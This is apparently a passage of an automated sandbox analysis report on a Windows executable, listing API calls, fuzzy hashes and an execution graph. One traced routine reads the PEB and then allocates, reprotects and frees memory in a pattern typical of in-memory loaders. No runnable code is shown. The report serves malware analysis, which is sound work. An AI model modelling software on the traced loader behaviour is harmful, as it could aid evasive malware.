                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@TextWindow$Length
                                              • String ID:
                                              • API String ID: 2308334395-0
                                              • Opcode ID: 75fbe4f14149e316190ba2f6ce587c2ecc1a033a2c447ca3c193c20f3dddf7fa
                                              • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                              • Opcode Fuzzy Hash: 75fbe4f14149e316190ba2f6ce587c2ecc1a033a2c447ca3c193c20f3dddf7fa
                                              • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                              APIs
                                              • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                              • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                              • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                              • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CreateFontIndirectItemMessageObjectSend
                                              • String ID:
                                              • API String ID: 2001801573-0
                                              • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                              • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                              • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                              • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                              APIs
                                              • GetParent.USER32(?), ref: 00401BA8
                                              • GetWindowRect.USER32(?,?), ref: 00401BC1
                                              • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                              • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ClientScreen$ParentRectWindow
                                              • String ID:
                                              • API String ID: 2099118873-0
                                              • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                              • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                              • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                              • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                              APIs
                                              • _wtol.MSVCRT([G@,GUIFlags,00000000,00403CF4,00000000,0041734C,0040475B,00000000), ref: 00403C89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: _wtol
                                              • String ID: GUIFlags$[G@
                                              • API String ID: 2131799477-2126219683
                                              • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                              • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                              • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                              • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                              APIs
                                              • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID: ?O@
                                              • API String ID: 1431749950-3511380453
                                              • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                              • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                              • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                              • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                              Execution Graph

                                              Execution Coverage:1.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:1.2%
                                              Total number of Nodes:1714
                                              Total number of Limit Nodes:21
                                              execution_graph 8741 c85748 8742 c8577f 8741->8742 8743 c8575a 8741->8743 8743->8742 8750 c86747 8743->8750 8748 c890eb _unexpected 68 API calls 8749 c8579d 8748->8749 8751 c86913 __CreateFrameInfo 78 API calls 8750->8751 8752 c8578c 8751->8752 8753 c86750 8752->8753 8754 c86913 __CreateFrameInfo 78 API calls 8753->8754 8755 c85796 8754->8755 8755->8748 8800 c86f0a 8801 c85a25 CatchGuardHandler 5 API calls 8800->8801 8802 c86f1c ___CxxFrameHandler 8801->8802 6895 c8908c 6896 c890aa 6895->6896 6900 c890ca 6895->6900 6897 c89d91 __dosmaperr 14 API calls 6896->6897 6898 c890c0 6897->6898 6901 c89cb0 6898->6901 6904 c89bfc 6901->6904 6903 c89cbc 6903->6900 6905 c89c0e __FrameHandler3::FrameUnwindToState 6904->6905 6908 c89c33 6905->6908 6907 c89c26 __FrameHandler3::FrameUnwindToState 6907->6903 6909 c89c4a 6908->6909 6910 c89c43 6908->6910 6915 c89c58 6909->6915 6923 c89a8b 6909->6923 6919 c892a0 GetLastError 6910->6919 6913 c89c7f 6913->6915 6926 c89cc0 IsProcessorFeaturePresent 6913->6926 6915->6907 6916 c89caf 6917 c89bfc ___std_exception_copy 29 API calls 6916->6917 6918 c89cbc 6917->6918 6918->6907 6920 c892b9 6919->6920 6930 c899a2 6920->6930 6924 c89aaf 6923->6924 6925 c89a96 GetLastError SetLastError 6923->6925 6924->6913 6925->6913 6927 c89ccc 6926->6927 6952 c89ab4 6927->6952 6931 c899bb 6930->6931 6932 c899b5 6930->6932 6933 c8c3b2 __dosmaperr 6 API calls 6931->6933 6937 c892d5 SetLastError 6931->6937 6934 c8c373 __dosmaperr 6 API calls 6932->6934 6935 c899d5 6933->6935 6934->6931 6936 c89da4 __dosmaperr 14 API calls 6935->6936 6935->6937 6938 c899e5 6936->6938 6937->6909 6939 c899ed 6938->6939 6940 c89a02 6938->6940 6942 c8c3b2 __dosmaperr 6 API calls 6939->6942 6941 c8c3b2 __dosmaperr 6 API calls 6940->6941 6943 c89a0e 6941->6943 6944 c899f9 6942->6944 6945 c89a21 6943->6945 6946 c89a12 6943->6946 6949 c89e01 ___free_lconv_mon 14 API calls 6944->6949 6948 c895ce __dosmaperr 14 API calls 6945->6948 6947 c8c3b2 __dosmaperr 6 API calls 6946->6947 6947->6944 6950 c89a2c 6948->6950 6949->6937 6951 c89e01 ___free_lconv_mon 14 API calls 6950->6951 6951->6937 6953 c89ad0 __FrameHandler3::FrameUnwindToState 6952->6953 6954 c89afc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6953->6954 6955 c89bcd __FrameHandler3::FrameUnwindToState 6954->6955 6958 c85a25 6955->6958 6957 c89beb GetCurrentProcess TerminateProcess 6957->6916 6959 c85a2d 6958->6959 6960 c85a2e IsProcessorFeaturePresent 6958->6960 6959->6957 6962 c85a70 6960->6962 6965 c85a33 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6962->6965 6964 c85b53 6964->6957 6965->6964 6866 c922cc 6878 c92277 GetPEB 6866->6878 6868 c922e5 6869 c923fa 6868->6869 6870 c92309 VirtualAlloc 6868->6870 6870->6869 6871 c92321 6870->6871 6880 c92098 VirtualAlloc 6871->6880 6874 c923eb VirtualFree 6874->6869 6875 c92359 VirtualAlloc 6875->6874 6876 c92370 6875->6876 6877 c923ae VirtualProtect 6876->6877 6877->6874 6879 c92295 6878->6879 6879->6868 6881 c92270 6880->6881 6882 c920d0 VirtualFree 6880->6882 6881->6874 6881->6875 6882->6881 7000 c8f04d 7001 c8f060 __FrameHandler3::FrameUnwindToState 7000->7001 7004 c8ef28 7001->7004 7003 c8f06c __FrameHandler3::FrameUnwindToState 7005 c8ef34 __FrameHandler3::FrameUnwindToState 7004->7005 7006 c8ef3e 7005->7006 7007 c8ef61 7005->7007 7008 c89c33 ___std_exception_copy 29 API calls 7006->7008 7014 c8ef59 7007->7014 7015 c8cd97 EnterCriticalSection 7007->7015 7008->7014 7010 c8ef7f 7016 c8efbf 7010->7016 7012 c8ef8c 7030 c8efb7 7012->7030 7014->7003 7015->7010 7017 c8efcc 7016->7017 7018 c8efef 7016->7018 7019 c89c33 ___std_exception_copy 29 API calls 7017->7019 7029 c8efe7 7018->7029 7033 c8cbac 7018->7033 7019->7029 7025 c8f01b 7050 c8f83c 7025->7050 7028 c89e01 ___free_lconv_mon 14 API calls 7028->7029 7029->7012 7307 c8cdab LeaveCriticalSection 7030->7307 7032 c8efbd 7032->7014 7034 c8cbc5 7033->7034 7038 c8cbec 7033->7038 7035 c8d3f4 __FrameHandler3::FrameUnwindToState 29 API calls 7034->7035 7034->7038 7036 c8cbe1 7035->7036 7057 c8e723 7036->7057 7039 c8eafb 7038->7039 7040 c8eb12 7039->7040 7041 c8eb24 7039->7041 7040->7041 7042 c89e01 ___free_lconv_mon 14 API calls 7040->7042 7043 c8d3f4 7041->7043 7042->7041 7044 c8d400 7043->7044 7045 c8d415 7043->7045 7046 c89d91 __dosmaperr 14 API calls 7044->7046 7045->7025 7047 c8d405 7046->7047 7048 c89cb0 ___std_exception_copy 29 API calls 7047->7048 7049 c8d410 7048->7049 7049->7025 7051 c8f865 7050->7051 7056 c8f022 7050->7056 7052 c8f8b4 7051->7052 7054 c8f88c 7051->7054 7053 c89c33 ___std_exception_copy 29 API calls 7052->7053 7053->7056 7272 c8f7ab 7054->7272 7056->7028 7056->7029 7058 c8e72f __FrameHandler3::FrameUnwindToState 7057->7058 7059 c8e770 7058->7059 7060 c8e7b6 7058->7060 7067 c8e737 7058->7067 7061 c89c33 ___std_exception_copy 29 API calls 7059->7061 7068 c8b636 EnterCriticalSection 7060->7068 7061->7067 7063 c8e7bc 7064 c8e7da 7063->7064 7069 c8e834 7063->7069 7095 c8e82c 7064->7095 7067->7038 7068->7063 7070 c8e85c 7069->7070 7093 c8e87f __FrameHandler3::FrameUnwindToState 7069->7093 7071 c8e860 7070->7071 7073 c8e8bb 7070->7073 7072 c89c33 ___std_exception_copy 29 API calls 7071->7072 7072->7093 7074 c8e8d9 7073->7074 7098 c8eed8 7073->7098 7101 c8e3b0 7074->7101 7078 c8e938 7080 c8e94c 7078->7080 7081 c8e9a1 WriteFile 7078->7081 7079 c8e8f1 7082 c8e8f9 7079->7082 7083 c8e920 7079->7083 7086 c8e98d 7080->7086 7087 c8e954 7080->7087 7084 c8e9c3 GetLastError 7081->7084 7081->7093 7082->7093 7108 c8e348 7082->7108 7113 c8df81 GetConsoleOutputCP 7083->7113 7084->7093 7141 c8e42d 7086->7141 7088 c8e979 7087->7088 7089 c8e959 7087->7089 7133 c8e5f1 7088->7133 7089->7093 7126 c8e508 7089->7126 7093->7064 7271 c8b659 LeaveCriticalSection 7095->7271 7097 c8e832 7097->7067 7148 c8ee55 7098->7148 7100 c8eef1 7100->7074 7170 c8eb3b 7101->7170 7103 c8e426 7103->7078 7103->7079 7104 c8e3c2 7104->7103 7105 c8e3f0 7104->7105 7179 c89350 7104->7179 7105->7103 7107 c8e40a GetConsoleMode 7105->7107 7107->7103 7109 c8e36a 7108->7109 7111 c8e39f 7108->7111 7110 c8e3a1 GetLastError 7109->7110 7109->7111 7112 c8eef6 5 API calls __FrameHandler3::FrameUnwindToState 7109->7112 7110->7111 7111->7093 7112->7109 7114 c8dff3 7113->7114 7119 c8dffa CatchIt 7113->7119 7115 c89350 __FrameHandler3::FrameUnwindToState 64 API calls 7114->7115 7115->7119 7116 c85a25 CatchGuardHandler 5 API calls 7117 c8e341 7116->7117 7117->7093 7118 c8e2b0 7118->7116 7119->7118 7120 c8d2c1 64 API calls __FrameHandler3::FrameUnwindToState 7119->7120 7121 c8ed31 5 API calls __FrameHandler3::FrameUnwindToState 7119->7121 7123 c8e229 WriteFile 7119->7123 7125 c8e267 WriteFile 7119->7125 7268 c8b2b9 7119->7268 7120->7119 7121->7119 7123->7119 7124 c8e31f GetLastError 7123->7124 7124->7118 7125->7119 7125->7124 7130 c8e517 __FrameHandler3::FrameUnwindToState 7126->7130 7127 c8e5d6 7128 c85a25 CatchGuardHandler 5 API calls 7127->7128 7132 c8e5ef 7128->7132 7129 c8e58c WriteFile 7129->7130 7131 c8e5d8 GetLastError 7129->7131 7130->7127 7130->7129 7131->7127 7132->7093 7140 c8e600 __FrameHandler3::FrameUnwindToState 7133->7140 7134 c8e708 7135 c85a25 CatchGuardHandler 5 API calls 7134->7135 7136 c8e721 7135->7136 7136->7093 7137 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 7137->7140 7138 c8e70a GetLastError 7138->7134 7139 c8e6bf WriteFile 7139->7138 7139->7140 7140->7134 7140->7137 7140->7138 7140->7139 7142 c8e43c __FrameHandler3::FrameUnwindToState 7141->7142 7145 c8e4ac WriteFile 7142->7145 7147 c8e4ed 7142->7147 7143 c85a25 CatchGuardHandler 5 API calls 7144 c8e506 7143->7144 7144->7093 7145->7142 7146 c8e4ef GetLastError 7145->7146 7146->7147 7147->7143 7154 c8b70d 7148->7154 7150 c8ee67 7151 c8ee83 SetFilePointerEx 7150->7151 7153 c8ee6f __FrameHandler3::FrameUnwindToState 7150->7153 7152 c8ee9b GetLastError 7151->7152 7151->7153 7152->7153 7153->7100 7155 c8b71a 7154->7155 7156 c8b72f 7154->7156 7167 c89d7e 7155->7167 7158 c89d7e __dosmaperr 14 API calls 7156->7158 7160 c8b754 7156->7160 7161 c8b75f 7158->7161 7160->7150 7163 c89d91 __dosmaperr 14 API calls 7161->7163 7162 c89d91 __dosmaperr 14 API calls 7164 c8b727 7162->7164 7165 c8b767 7163->7165 7164->7150 7166 c89cb0 ___std_exception_copy 29 API calls 7165->7166 7166->7164 7168 c898f1 __dosmaperr 14 API calls 7167->7168 7169 c89d83 7168->7169 7169->7162 7171 c8eb48 7170->7171 7173 c8eb55 7170->7173 7172 c89d91 __dosmaperr 14 API calls 7171->7172 7174 c8eb4d 7172->7174 7175 c8eb61 7173->7175 7176 c89d91 __dosmaperr 14 API calls 7173->7176 7174->7104 7175->7104 7177 c8eb82 7176->7177 7178 c89cb0 ___std_exception_copy 29 API calls 7177->7178 7178->7174 7180 c89360 7179->7180 7185 c8d232 7180->7185 7186 c8d249 7185->7186 7187 c8937d 7185->7187 7186->7187 7193 c8c027 7186->7193 7189 c8d290 7187->7189 7190 c8938a 7189->7190 7191 c8d2a7 7189->7191 7190->7105 7191->7190 7252 c8ae4d 7191->7252 7194 c8c033 __FrameHandler3::FrameUnwindToState 7193->7194 7206 c897a0 GetLastError 7194->7206 7197 c8c082 7197->7187 7199 c8c05a 7234 c8c0a8 7199->7234 7207 c897bc 7206->7207 7208 c897b6 7206->7208 7209 c8c3b2 __dosmaperr 6 API calls 7207->7209 7212 c897c0 SetLastError 7207->7212 7210 c8c373 __dosmaperr 6 API calls 7208->7210 7211 c897d8 7209->7211 7210->7207 7211->7212 7214 c89da4 __dosmaperr 14 API calls 7211->7214 7216 c89850 7212->7216 7217 c89855 7212->7217 7215 c897ed 7214->7215 7218 c897f5 7215->7218 7219 c89806 7215->7219 7216->7197 7233 c8b43d EnterCriticalSection 7216->7233 7220 c891a7 __FrameHandler3::FrameUnwindToState 66 API calls 7217->7220 7221 c8c3b2 __dosmaperr 6 API calls 7218->7221 7222 c8c3b2 __dosmaperr 6 API calls 7219->7222 7223 c8985a 7220->7223 7224 c89803 7221->7224 7225 c89812 7222->7225 7228 c89e01 ___free_lconv_mon 14 API calls 7224->7228 7226 c8982d 7225->7226 7227 c89816 7225->7227 7229 c895ce __dosmaperr 14 API calls 7226->7229 7230 c8c3b2 __dosmaperr 6 API calls 7227->7230 7228->7212 7231 c89838 7229->7231 7230->7224 7232 c89e01 ___free_lconv_mon 14 API calls 7231->7232 7232->7212 7233->7199 7235 c8c06b 7234->7235 7236 c8c0b6 __dosmaperr 7234->7236 7238 c8c087 7235->7238 7236->7235 7237 c8bddb __dosmaperr 14 API calls 7236->7237 7237->7235 7239 c8b485 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 7238->7239 7240 c8c07e 7239->7240 7240->7197 7241 c891a7 7240->7241 7242 c8c79c __FrameHandler3::FrameUnwindToState EnterCriticalSection LeaveCriticalSection 7241->7242 7243 c891ac 7242->7243 7244 c8c7e1 __FrameHandler3::FrameUnwindToState 67 API calls 7243->7244 7248 c891b7 7243->7248 7244->7248 7245 c891c1 IsProcessorFeaturePresent 7249 c891cd 7245->7249 7246 c891e0 7247 c88a3f __FrameHandler3::FrameUnwindToState 21 API calls 7246->7247 7250 c891ea 7247->7250 7248->7245 7248->7246 7251 c89ab4 __FrameHandler3::FrameUnwindToState 8 API calls 7249->7251 7251->7246 7253 c897a0 _unexpected 68 API calls 7252->7253 7254 c8ae52 7253->7254 7257 c8ad65 7254->7257 7258 c8ad71 __FrameHandler3::FrameUnwindToState 7257->7258 7259 c8b43d __FrameHandler3::FrameUnwindToState EnterCriticalSection 7258->7259 7261 c8ad8b 7258->7261 7266 c8ad9b 7259->7266 7260 c8adc7 7263 c8ade4 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 7260->7263 7262 c8ad92 7261->7262 7264 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 7261->7264 7262->7190 7263->7261 7265 c8ae04 7264->7265 7266->7260 7267 c89e01 ___free_lconv_mon 14 API calls 7266->7267 7267->7260 7270 c8b2cc __FrameHandler3::FrameUnwindToState 7268->7270 7269 c8b30a WideCharToMultiByte 7269->7119 7270->7269 7271->7097 7273 c8f7b7 __FrameHandler3::FrameUnwindToState 7272->7273 7280 c8b636 EnterCriticalSection 7273->7280 7275 c8f7c5 7276 c8f7f6 7275->7276 7281 c8f8df 7275->7281 7294 c8f830 7276->7294 7280->7275 7282 c8b70d __FrameHandler3::FrameUnwindToState 29 API calls 7281->7282 7285 c8f8ef 7282->7285 7283 c8f8f5 7297 c8b67c 7283->7297 7285->7283 7286 c8f927 7285->7286 7288 c8b70d __FrameHandler3::FrameUnwindToState 29 API calls 7285->7288 7286->7283 7287 c8b70d __FrameHandler3::FrameUnwindToState 29 API calls 7286->7287 7290 c8f933 CloseHandle 7287->7290 7289 c8f91e 7288->7289 7291 c8b70d __FrameHandler3::FrameUnwindToState 29 API calls 7289->7291 7290->7283 7292 c8f93f GetLastError 7290->7292 7291->7286 7292->7283 7293 c8f94d __FrameHandler3::FrameUnwindToState 7293->7276 7306 c8b659 LeaveCriticalSection 7294->7306 7296 c8f819 7296->7056 7298 c8b68b 7297->7298 7299 c8b6f2 7297->7299 7298->7299 7304 c8b6b5 7298->7304 7300 c89d91 __dosmaperr 14 API calls 7299->7300 7301 c8b6f7 7300->7301 7302 c89d7e __dosmaperr 14 API calls 7301->7302 7303 c8b6e2 7302->7303 7303->7293 7304->7303 7305 c8b6dc SetStdHandle 7304->7305 7305->7303 7306->7296 7307->7032 8703 c8b78d GetStartupInfoW 8704 c8b7aa 8703->8704 8705 c8b83e 8703->8705 8704->8705 8709 c8b598 8704->8709 8707 c8b7d2 8707->8705 8708 c8b802 GetFileType 8707->8708 8708->8707 8710 c8b5a4 __FrameHandler3::FrameUnwindToState 8709->8710 8711 c8b5ad 8710->8711 8712 c8b5ce 8710->8712 8713 c89d91 __dosmaperr 14 API calls 8711->8713 8722 c8b43d EnterCriticalSection 8712->8722 8715 c8b5b2 8713->8715 8716 c89cb0 ___std_exception_copy 29 API calls 8715->8716 8717 c8b5bc 8716->8717 8717->8707 8718 c8b606 8730 c8b62d 8718->8730 8719 c8b5da 8719->8718 8723 c8b4e8 8719->8723 8722->8719 8724 c89da4 __dosmaperr 14 API calls 8723->8724 8725 c8b4fa 8724->8725 8728 c8c3f4 6 API calls 8725->8728 8729 c8b507 8725->8729 8726 c89e01 ___free_lconv_mon 14 API calls 8727 c8b55c 8726->8727 8727->8719 8728->8725 8729->8726 8733 c8b485 LeaveCriticalSection 8730->8733 8732 c8b634 8732->8717 8733->8732 8290 c8664e 8291 c86687 8290->8291 8293 c86657 8290->8293 8292 c86913 __CreateFrameInfo 78 API calls 8294 c86692 8292->8294 8293->8291 8293->8292 8295 c86913 __CreateFrameInfo 78 API calls 8294->8295 8296 c8669d 8295->8296 8297 c890eb _unexpected 68 API calls 8296->8297 8298 c866a5 8297->8298 8544 c87fc0 8545 c898f1 __dosmaperr 14 API calls 8544->8545 8546 c87fcd 8545->8546 8206 c856c4 8210 c860e0 8206->8210 8208 c856d7 GetStartupInfoW 8209 c856ea 8208->8209 8211 c860f7 8210->8211 8211->8208 8211->8211 8151 c87945 8154 c87978 8151->8154 8157 c87ec4 8154->8157 8158 c87953 8157->8158 8160 c87ed1 ___std_exception_copy 8157->8160 8159 c87efe 8162 c89127 ___std_exception_copy 14 API calls 8159->8162 8160->8158 8160->8159 8163 c8914d 8160->8163 8162->8158 8164 c89169 8163->8164 8165 c8915b 8163->8165 8166 c89d91 __dosmaperr 14 API calls 8164->8166 8165->8164 8170 c89181 8165->8170 8167 c89171 8166->8167 8168 c89cb0 ___std_exception_copy 29 API calls 8167->8168 8169 c8917b 8168->8169 8169->8159 8170->8169 8171 c89d91 __dosmaperr 14 API calls 8170->8171 8171->8167 8756 c88b47 8759 c88ace 8756->8759 8760 c88ada __FrameHandler3::FrameUnwindToState 8759->8760 8767 c8b43d EnterCriticalSection 8760->8767 8762 c88b12 8768 c88b30 8762->8768 8763 c88ae4 8763->8762 8765 c8c0a8 __FrameHandler3::FrameUnwindToState 14 API calls 8763->8765 8765->8763 8767->8763 8771 c8b485 LeaveCriticalSection 8768->8771 8770 c88b1e 8771->8770 8303 c8a659 8304 c8a66b 8303->8304 8313 c8a667 8303->8313 8305 c8a670 8304->8305 8306 c8a696 8304->8306 8307 c89da4 __dosmaperr 14 API calls 8305->8307 8308 c8c517 32 API calls 8306->8308 8306->8313 8309 c8a679 8307->8309 8311 c8a6b6 8308->8311 8310 c89e01 ___free_lconv_mon 14 API calls 8309->8310 8310->8313 8312 c89e01 ___free_lconv_mon 14 API calls 8311->8312 8312->8313 6710 c84e5a GetProcessHeap RtlAllocateHeap 6711 c84f3b 6710->6711 6712 c84e84 __FrameHandler3::FrameUnwindToState 6710->6712 6713 c84e94 GetModuleFileNameW 6712->6713 6714 c84f11 GetProcessHeap RtlFreeHeap 6713->6714 6717 c84eaf _wcsrchr 6713->6717 6714->6711 6715 c84f27 MulDiv 6714->6715 6715->6711 6716 c84edb lstrlenW 6718 c84eea 6716->6718 6717->6714 6717->6716 6718->6714 8772 c8b35c GetEnvironmentStringsW 8773 c8b3f7 8772->8773 8774 c8b374 8772->8774 8775 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8774->8775 8776 c8b391 8775->8776 8777 c8b39b FreeEnvironmentStringsW 8776->8777 8778 c8b3a6 8776->8778 8777->8773 8779 c8bbef 15 API calls 8778->8779 8780 c8b3ad 8779->8780 8781 c8b3b5 8780->8781 8782 c8b3c6 8780->8782 8783 c89e01 ___free_lconv_mon 14 API calls 8781->8783 8784 c8b2b9 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8782->8784 8785 c8b3ba FreeEnvironmentStringsW 8783->8785 8786 c8b3d6 8784->8786 8785->8773 8787 c8b3dd 8786->8787 8788 c8b3e5 8786->8788 8789 c89e01 ___free_lconv_mon 14 API calls 8787->8789 8790 c89e01 ___free_lconv_mon 14 API calls 8788->8790 8791 c8b3e3 FreeEnvironmentStringsW 8789->8791 8790->8791 8791->8773 7821 c8f9d0 7824 c8f9ee 7821->7824 7823 c8f9e6 7825 c8f9f3 7824->7825 7826 c8fa88 7825->7826 7829 c902b3 7825->7829 7826->7823 7830 c902c6 DecodePointer 7829->7830 7831 c902d6 7829->7831 7830->7831 7832 c9031a 7831->7832 7833 c8fc1f 7831->7833 7834 c90305 7831->7834 7832->7833 7835 c89d91 __dosmaperr 14 API calls 7832->7835 7833->7823 7834->7833 7836 c89d91 __dosmaperr 14 API calls 7834->7836 7835->7833 7836->7833 8515 c8da10 8518 c8da27 8515->8518 8517 c8da22 8519 c8da49 8518->8519 8520 c8da35 8518->8520 8521 c8da51 8519->8521 8522 c8da63 8519->8522 8523 c89d91 __dosmaperr 14 API calls 8520->8523 8525 c89d91 __dosmaperr 14 API calls 8521->8525 8528 c8a49b 68 API calls 8522->8528 8531 c8da61 8522->8531 8524 c8da3a 8523->8524 8526 c89cb0 ___std_exception_copy 29 API calls 8524->8526 8527 c8da56 8525->8527 8529 c8da45 8526->8529 8530 c89cb0 ___std_exception_copy 29 API calls 8527->8530 8528->8531 8529->8517 8530->8531 8531->8517 8547 c863d0 8548 c863ee __InternalCxxFrameHandler 8547->8548 8559 c86390 8548->8559 8560 c863af 8559->8560 8561 c863a2 8559->8561 8562 c85a25 CatchGuardHandler 5 API calls 8561->8562 8562->8560 8241 c88a91 8242 c88aa0 8241->8242 8243 c88ac3 8241->8243 8242->8243 8244 c89d91 __dosmaperr 14 API calls 8242->8244 8245 c88ab3 8244->8245 8246 c89cb0 ___std_exception_copy 29 API calls 8245->8246 8247 c88abe 8246->8247 7837 c879d4 7840 c87f27 7837->7840 7839 c879e9 7841 c87f3b 7840->7841 7842 c87f34 7840->7842 7841->7839 7843 c89127 ___std_exception_copy 14 API calls 7842->7843 7843->7841 8314 c88a55 8315 c88a6b __FrameHandler3::FrameUnwindToState __dosmaperr 8314->8315 8316 c897a0 _unexpected 68 API calls 8315->8316 8319 c890fc 8316->8319 8317 c891a7 __FrameHandler3::FrameUnwindToState 68 API calls 8318 c89126 8317->8318 8319->8317 8178 c88516 8179 c8852b 8178->8179 8180 c89da4 __dosmaperr 14 API calls 8179->8180 8181 c88552 8180->8181 8182 c8855a 8181->8182 